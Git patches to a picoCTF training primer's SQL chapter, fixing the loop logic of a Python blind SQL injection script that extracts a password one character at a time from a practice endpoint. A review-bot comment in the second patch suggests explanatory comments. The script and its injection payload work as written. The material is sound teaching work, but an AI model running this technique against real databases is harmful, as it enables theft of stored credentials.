From 5b3d94d0e06def3342a65f19108abc44e16357c5 Mon Sep 17 00:00:00 2001
From: Abhinav Adhikari <167470786+JollyFrolics@users.noreply.github.com>
Date: Tue, 1 Oct 2024 02:00:42 +0545
Subject: [PATCH 1/2] Update sql.adoc

Improved code
---
 chapters/sql.adoc | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/chapters/sql.adoc b/chapters/sql.adoc
index 967b4a4..6d1f6b6 100644
--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -252,13 +252,14 @@ for i in range(40):
 accum += letter
 r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
- + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
+ + letter +"'=( select substr(binary password,"+str(i + 1)+",1) from pico_blind_injection where id=1 ) and ''= '")
 if 'NOTHING FOUND...' in r.text:
 accum = accum[:-1]
 print("nope")
 else:
 print(f"We found the character: {letter}")
+ break
 print(accum)
 ----

From 096ae6fd5d1f3aada52d6914690c5ccd7d2d30fa Mon Sep 17 00:00:00 2001
From: Abhinav Adhikari <167470786+JollyFrolics@users.noreply.github.com>
Date: Tue, 1 Oct 2024 02:24:49 +0545
Subject: [PATCH 2/2] Fixed code in blind SQL injection to avoid unnecessary iteration

---
 chapters/sql.adoc | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/chapters/sql.adoc b/chapters/sql.adoc
index 6d1f6b6..cd916b4 100644
--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -1,4 +1,4 @@
-
+
 == Infiltrating in a database
 [discrete]
 ===== Samuel Sabogal Pardo
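Review bot: The `break` added under the `else:` branch has no comment saying why the inner `for letter in printable:` loop may stop early, and since this listing is teaching material the reader has to work it out from the `'NOTHING FOUND...'` check above it; a one-line comment such as `# each position holds one character: stop once it matches` at the indentation of the `print` above it would make that explicit. It is also worth stating in the listing that `'NOTHING FOUND...'` is the literal response text of this training target, so the check on that line is specific to it rather than a general property of the technique. The enclosing `for i in range(40):` loop starts outside the hunk.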
@@ -247,12 +247,12 @@ import requests
 from string import printable
 accum = ""
-for i in range(40):
+for i in range(1, 40):
 for letter in printable:
 accum += letter
 r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
- + letter +"'=( select substr(binary password,"+str(i + 1)+",1) from pico_blind_injection where id=1 ) and ''= '")
+ + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
 if 'NOTHING FOUND...' in r.text:
 accum = accum[:-1]